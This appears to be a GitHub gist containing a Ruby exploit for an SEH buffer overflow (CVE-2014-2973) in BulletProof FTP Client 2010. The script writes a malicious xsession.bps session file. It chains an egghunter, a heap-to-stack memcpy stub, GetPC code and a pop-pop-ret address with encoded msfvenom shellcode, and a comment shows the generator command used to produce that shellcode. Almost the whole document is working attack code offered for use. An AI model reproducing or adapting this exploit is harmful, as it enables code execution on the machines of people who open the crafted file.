Created
December 3, 2014 10:05
-
-
Save mfadzilr/356c882cc70a41610c6f to your computer and use it in GitHub Desktop.
BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit | |
| # Date: Dec 03 2014 | |
| # Vulnerability Discovery: Gabor Seljan | |
| # Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com> | |
| # Software Link: http://www.bpftp.com/ | |
| # Version: 2010.75.0.76 | |
| # Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600] | |
| # CVE: CVE-2014-2973 | |
| # Notes: bypass stack size limitation for bigger payload. Allocate 2nd | |
| # shellcode in heap and copy back to stack. This exploit use egghunter | |
| # to locate 2nd shellcode in heap and copy to stack using memcpy function. | |
| # Offset | |
| seh = 93 | |
| filename = "xsession.bps" | |
| buff = "A" * 400 | |
| # ./msfvenom -p windows/messagebox TEXT="Hello Exploit-DB" EXITFUNC=process -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby | |
| heap_sc = | |
| "w00tw00t" + | |
| "\xba\xaa\x8c\x8e\xda\xdb\xd3\xd9\x74\x24\xf4\x5f\x2b\xc9" + | |
| "\xb1\x44\x31\x57\x14\x83\xef\xfc\x03\x57\x10\x48\x79\x57" + | |
| "\x31\x17\x5b\x1c\xe2\xd3\x6d\x0f\x58\x6c\xbf\x66\xf9\x19" + | |
| "\xce\x48\x89\x6b\x3d\x22\xfb\x8f\xb6\x72\x0c\x24\xb6\x5a" + | |
| "\x87\x0c\x7f\xd4\x8f\x05\x8c\xb3\xae\x34\x8d\xa5\xd1\x3d" + | |
| "\x1e\x02\x36\xca\x9a\x76\xbd\x98\x0c\xff\xc0\xca\xc6\xb5" + | |
| "\xda\x81\x83\x69\xda\x7e\xd0\x5e\x95\x0b\x23\x14\x24\xe5" + | |
| "\x7d\xd5\x16\x39\x81\x85\xdd\x79\x0e\xd1\x1c\xb6\xe2\xdc" + | |
| "\x59\xa3\x09\xe5\x19\x17\xda\x6f\x03\xdc\x40\xb4\xc2\x09" + | |
| "\x12\x3f\xc8\x86\x50\x65\xcd\x19\x8c\x11\xe9\x92\x53\xce" + | |
| "\x7b\xe0\x77\x12\x1d\x2b\xc5\x22\xf4\x7f\xa3\xd6\x8f\xbd" + | |
| "\xdc\x96\xde\x4f\xf1\xf5\x36\xd0\xf6\x05\x39\x67\x4d\xfe" + | |
| "\x7d\x09\x96\x1c\xf2\x72\x3a\xc5\xa7\x94\xcd\xfa\xb7\x9b" + | |
| "\x5b\x41\x40\x0b\x30\x26\x70\x8a\xa0\x85\x42\x22\x55\x82" + | |
| "\xd7\x49\xf0\x20\x90\xf1\xde\xce\x29\xef\x49\x30\x7c\xeb" + | |
| "\xfc\x0c\x2f\x48\x56\x32\x9d\x12\x20\x2f\x3a\x38\xc7\x31" + | |
| "\xbd\x43\xe8\xda\x2e\xc3\x4f\x3b\xd9\x52\x17\x5e\x5b\xfc" + | |
| "\x9a\xc5\x28\x8f\x15\xdd\x47\x33\x72\xeb\xde\x28\x12\xb3" + | |
| "\xc0\x8e\xc3\x2b\x75\xe3\x47\xee\x1d\x8b\x2b\x81\xb4\x03" + | |
| "\xdb\x7d\x02\xab\x4b\x36\xe9\x27\xe0\xf7\x38\x3f\xb4\xd3" + | |
| "\xaa\xb6\xa4\x2d\x19\x9a\x75\x1f\xcf\xe5\xaa\xae\x2f\x49" + | |
| "\xb4\x84\xa7" | |
| # badchar '\x00\x0a\x0d\x1a\xb1\x83\xb2' | |
| # only locate 1st heap address :P | |
| heap_addr = | |
| "\x50" + # push eax | |
| "\xbb\xaf\x77\x77\x77" + # mov ebx,777777afh | |
| "\x81\xeb\x7f\x77\x77\x77" + # sub ebx,7777777fh | |
| "\x64\x8b\x1b" + # mov ebx,dword ptr fs:[ebx] | |
| "\xb9\x0f\x78\x77\x77" + # mov ebx,7777780Fh | |
| "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,7777777fh | |
| "\x8b\x1c\x0b" + # mov ebx,dword ptr [ebx+ecx] | |
| "\x8b\x1b" # mov ebx,dword ptr [ebx] | |
| egghunter = | |
| "\x8b\xd3\xeb\x05" + # mov edx,ebx # jmp $+7h | |
| "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e" + | |
| "\x3c\x05\x5a\x74\xef\xb8" + | |
| "\x77\x30\x30\x74" + # our tag 'w00t' | |
| "\x8b\xfa\xaf\x75\xea\xaf" + | |
| "\x75\xe7" | |
| memcpy_func = | |
| "\x58" + # pop eax # esp | |
| "\x81\xc4\x54\xf2\xff\xff" + # add esp,-3500 | |
| "\xb9\xef\xe6\x3b\xef" + # mov ecx,0xef3be6ef | |
| "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f | |
| "\x89\x08" + # mov [eax],ecx # memcpy() static address | |
| "\x89\xc1" + # mov ecx,eax | |
| "\x83\xc1\x10" + # add ecx,10h | |
| "\x89\x48\x04" + # mov [eax+4h],ecx # void *dest | |
| "\x89\x48\x08" + # mov [eax+8h],ecx # void *dest | |
| "\x89\x78\x0c" + # mov [eax+0ch],edi # const wchar_t *src (shellcode) | |
| "\xb9\x8d\x79\x77\x77" + # mov ecx,0x7777798d | |
| "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f | |
| "\x89\x48\x10" + # mov [eax+10h],ecx # size_t count | |
| "\x94\xc3" # xchg eax,esp # retn | |
| stack_sc = heap_addr + egghunter + memcpy_func | |
| # GetPC | |
| buff[1,2] = "\xd9\xeb" # fldpi | |
| buff[3,5] = "\x9b\xd9\x74\x24\xf4" # fstenv [esp-0xc] | |
| buff[8,1] = "\x58" # pop eax # pop esp into eax | |
| # FixRet stub | |
| buff[9,7] = "\xc7\x40\x44\x45\x45\x45\x45" # (1) | |
| buff[16,7] = "\xc7\x40\x58\x45\x45\x45\x45" # (2) place holder for jmp | |
| buff[23,7] = "\xc7\x40\x5c\x45\x45\x45\x45" # (3) place holder for ppr | |
| buff[30,stack_sc.size] = stack_sc | |
| # restore 1st shellcode | |
| buff[12,4] = buff[seh-24,4] # replace with original sc (1) | |
| buff[19,4] = buff[seh-4,4] # replace with original sc (2) | |
| buff[26,4] = buff[seh,4] # replace with original sc (3) | |
| buff[seh-4,4] = "\xeb\xa6\x41\x41" # jmp $-166 | |
| buff[seh,4] = [0x72d11f39].pack('V').force_encoding("utf-8") # ppr : msacm32.drv only non-safeseh without null | |
| bps = | |
| "\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75" + | |
| "\x6C\x6C\x65\x74\x50\x72\x6F\x6F\x66\x20\x46\x54" + | |
| "\x50\x20\x43\x6C\x69\x65\x6E\x74\x20\x53\x65\x73" + | |
| "\x73\x69\x6F\x6E\x2D\x46\x69\x6C\x65\x20\x61\x6E" + | |
| "\x64\x20\x73\x68\x6F\x75\x6C\x64\x20\x6E\x6F\x74" + | |
| "\x20\x62\x65\x20\x6D\x6F\x64\x69\x66\x69\x65\x64" + | |
| "\x20\x64\x69\x72\x65\x63\x74\x6C\x79\x2E\x0D\x0A" + | |
| buff + "\x0D\x0A\x61\x6E" + | |
| "\x6F\x6E\x79\x6D\x6F\x75\x73\x0D\x0A" + heap_sc + "\x62\x70\x69" + | |
| "\x63\x70\x6C\x6E\x6B\x69\x69\x62\x6D\x66\x65\x0D" + | |
| "\x0A" | |
| File.open(filename,"wb") do |fp| | |
| fp.write(bps) | |
| puts "Exploit file: #{filename} size: #{bps.size}" | |
| fp.close | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment